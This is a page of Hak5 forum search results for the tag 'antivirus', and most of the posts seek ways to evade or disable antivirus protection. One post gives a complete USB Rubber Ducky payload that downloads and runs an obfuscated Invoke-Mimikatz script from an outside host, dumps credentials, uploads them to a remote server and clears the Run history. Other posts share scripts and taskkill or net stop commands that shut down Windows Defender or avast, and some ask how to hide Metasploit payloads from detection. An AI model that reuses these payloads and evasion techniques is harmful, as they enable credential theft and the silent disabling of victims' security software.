Jump to content

Search the Community

Showing results for tags 'antivirus'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 10 results

  1. Hello! I tryied to watch a video off the "Tech Roady" youtube channel on one of Hak5 products, and when I pressed the video my avast antivirus showed the following message: What is going on here? If it is actually an intended virus, how is it possible to do that through youtube? When I opened it again, this time by pasting the link, the video started playing while displaying only the video, and the antivirus stopped the virus again. This is the link of the video I tryied to watch. DO NOT open without protection: XXXXXXXXXXXXXXXXXXXXXXXXX https://www.youtube.com/watch?v=JaD-5_ubPRc XXXXXXXXXXXXXXXXXXXXXXXXX
  2. Im working with Kali Linux. I started getting into working with Metasploit, Payloads ... But heres the problem: I am not finding a way to create a Payload, that does not get detected by a Antivirus. Please Help 😄
  3. Hi, I'm trying to avoid antivirus detection of the Invoke-Mimikatz script mentioned here https://www.hak5.org/blog/15-second-password-hack-mr-robot-style I think the only safe way is Base64-encoding the Invoke-Mimikatz script and then decoding it modifying this string in the Powershell script on Rubber Ducky: STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://darren.kitchen/rx.php', $output)" I've found some useful links (https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/ and https://blog.den1al.com/2015/02/encoded-mimikatz-powershell-invoker/ but my coding skills are very limited and I'm searching some help to successfully modify the scripts to work with Rubber Ducky. This is my faulty payload: REM Title: Invoke mimikatz and send creds to remote server REM Author: Hak5Darren Props: Mubix, Clymb3r, Gentilkiwi DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://htmlguru.tk/im.ps1'))); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('http://htmlguru.tk/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER Thank you in advance for help!
  4. Hey, i recently tried to kill the AV Processes of for example AVG. My payload had SYSTEM privileges but i couldn't kill the AV Processes which also run under the SYSTEM user. I noticed a process which ran higher than SYSTEM which belonged to AVG. Is it common thats a av has some sort of process which runs in kernel mode or sth which protects the other processes. Is there even a way to kill the av as a System user?
  5. Hello guys, I've got a question considering antivirusses blocking rubber ducky payloads. I see all these .exe payloads like chromepass.exe and wirelesskeyview.exe being used in rubber duckies. Doesn't the antivirus of the attacked PC block the .exe programs when they start running from cmd? Or will it just work normally? If that is the case, this script can disable Windows Defender easily. Most PCs dont have windows defender as the only protection tho, so it is needed to disable other antivirusses, right? Most antivirusses can be shut off with the taskkill command, i tried killing my MalwareBytes and it worked: (remove " ") taskkill /f /im "Insert antivirusprogram name here.exe" Can someone help me out with this? I want to know if im just being dumb here, since all of this might not be needed. Thanks in advance
  6. guys, I ve made a payload with SET that isnt detectable by windows defender, I can perfectly get a meterpreter session without beign detected, anyway i can do most of the actions that are possible in meterpterer , but when I run the persistence command , Windows Defender gives a report of a trojan Swrort.A . some info Victim pc is running windows 10 64-bit I am attacking localy the attacker is kali sana 2.0 So the question is how can I avoid detection?
  7. Does anyone know a good way to change the signature of the metasploit "adobe_pdf_embedded_exe_nojs" exploit to get it past antivirus? I'm trying to copy the exploited PDF onto my test PC but the AV blocks it (BLOODHOUND.PDF.24). I can successfully avoid the AV with a venom tweaked reverse_tcp EXE, but can't figure out how to do the same with a PDF. (I can't even find the code for the exploit - I would expect it in the exploits\CVE2010-1240 folder) I'm using my tweaked reverse_tcp as the exe in the pdf. The exe gets past the AV without any problems. So the problem must be with the adobe_pdf_embedded... exploit. Has anyone managed to do this? Any advice or better ideas? I'm not fussed about the actual exploitation of the PC at this stage. I trying to learn how to dodge the antivirus.
  8. I am looking for material that might better explain the basic functionality of Anti-Virus programs such as the old mcafee and other programs such as security suites that are specifically produced by that system's managers? Maybe even to give a low-level user the introductory things such as how or what security suites look for when they scan a file, how the files are scanned etc? I mean, I have allot of questions on the subject, but they are all arbitrary and motivated for other reasons. I was wanting to find out the right direction in learning about this without it being through il-motivation.. I am, in a way, seeking a way to improve the security of a certain program through the creation of my own add-on(s)...
  9. Hello all, I've put together a simple script that attempts to disable Windows Defender on Windows 8.1 (will update to 7 later). My only problem is that I have an issue where there is a check box titled "turn on this app" and when I tab over to it, there is no way for me to uncheck that selection. I hope that someone might either find a work around to my method or find a way to make it work. Thank you Disable Windows Defender: REM Author : Hobbes REM Description : Attempts to disable Windows Defender anti-virus. REM Note : Only tested on Windows 8.1 - Windows 7 compatibility unknown. REM ***[Initial Delay]*** DELAY 3000 REM ***[Navigate to Windows Defender]*** GUI r DELAY 250 STRING cmd ENTER DELAY 800 STRING start "" "C:\Program Files\Windows Defender\MSASCui.exe" ENTER DELAY 400 REM **[Disables Defender]*** TAB DELAY 80 TAB DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 RIGHTARROW DELAY 80 TAB DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 DOWNARROW DELAY 80 TAB
  10. Not much to be said here. Stops avast! Antivirus shields to allow payload to fully execute. Could very easily be modified to stop any running services by name. DELAY 15000 REM This script will use an elevated command prompt to stop a service. REM I personally use this script to stop avast! Antivirus so I can execute the rest of my payload. GUI d DELAY 500 GUI r DELAY 500 STRING powershell Start-Process cmd.exe -Verb runAs ENTER DELAY 3000 ALT y DELAY 500 STRING net stop "avast! Antivirus" ENTER DELAY 1000 LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER DELAY 1000 STRING exit ENTER The end lines are for confirmation that you want avast shields to be shut down If using this to stop another service please comment out the following line or change them to what is needed. LEFTARROW LEFTARROW LEFTARROW DELAY 500 ENTER That is all, thanks for looking at my script!
×
×
  • Create New...